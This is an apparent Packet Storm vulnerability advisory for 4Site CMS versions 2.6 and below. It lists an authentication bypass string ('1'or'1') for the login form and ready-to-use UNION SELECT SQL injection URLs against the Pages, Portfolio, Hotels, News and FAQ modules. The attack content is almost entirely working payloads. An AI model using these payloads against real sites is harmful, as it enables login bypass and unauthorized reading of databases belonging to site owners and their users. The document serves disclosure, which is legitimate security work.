4Site CMS versions 2.6 and below suffer from multiple remote SQL injection vulnerabilities.
5317adad68f2d338b11b78fefffa8de75b0297f4a64f2c516ec4c0de39dbbf9d[WSEC-09-002] 4Site CMS <= 2.6 Multiple Remote SQL Injections
Developer site: https://www.4site.ru/
Discovered by D.Mortalov // wsec.ru
1. Auth Bypass
Login: 1'or'1
Password: 1'or’1
2. Multiple Remote SQL Injections in 4site CMS modules
"Pages" module:
https://vulnerable.site/print/print.shtml?page=-1+union+select+1
"Portfolio" module:
https://vulnerable.site/portfolio/index.shtml?s=1&i=-1+union+select+1,2,3,4,5,6,7,8,9
https://vulnerable.site/portfolio/index.shtml?s=-1+union+select+1
"Hotels" module:
https://vulnerable.site/hotel/?h=-1+union+select+1
"News" module:
https://vulnerable.site/news/news1.shtml?id=-1+union+select+1,2,3,4
"FAQ" module:
https://vulnerable.site/faq/index.shtml?th=-1+union+select+1
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed